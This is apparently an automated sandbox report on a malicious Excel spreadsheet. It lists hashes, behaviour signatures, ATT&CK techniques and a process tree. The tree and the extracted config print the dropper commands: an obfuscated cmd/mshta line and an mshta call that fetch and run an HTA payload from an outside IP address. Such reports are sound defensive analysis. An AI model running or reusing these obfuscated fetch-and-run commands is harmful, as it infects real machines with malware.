Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2023 12:44

General

  • Target

    55500673338314.xls

  • Size

    129KB

  • MD5

    e695d8c6c6db341f12701b4d18dd0d19

  • SHA1

    c73f399a25902d8d935e8b6b857ba9203c8536fe

  • SHA256

    59cb2552a34b231acb92fcee121b13d662ca7f0049a70aae86fe312270f548e5

  • SHA512

    605ba80a24c02cd34763177f1e99d0b74dd6a291623f1433f8f38cf357bd9ab5516c884ee569a5b0ffbc3bdc7645b8274a3428f3fb0f768d5be2a2f4ceaeacb0

  • SSDEEP

    3072:Wuk3hbdlylKsgqopeJBWhZFGkE+cL2NdAxEvN8B/W6X1yxYovrepMUdQ6gSz4i:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAmv

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://185.7.214.7/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\55500673338314.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/cc.html
        3⤵
        • Blocklisted process makes network request
        PID:624

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/5004-133-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-134-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-135-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-136-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-137-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-138-0x00007FFE4F800000-0x00007FFE4F810000-memory.dmp
    Filesize

    64KB

  • memory/5004-139-0x00007FFE4F800000-0x00007FFE4F810000-memory.dmp
    Filesize

    64KB

  • memory/5004-157-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-158-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-159-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB

  • memory/5004-160-0x00007FFE51E70000-0x00007FFE51E80000-memory.dmp
    Filesize

    64KB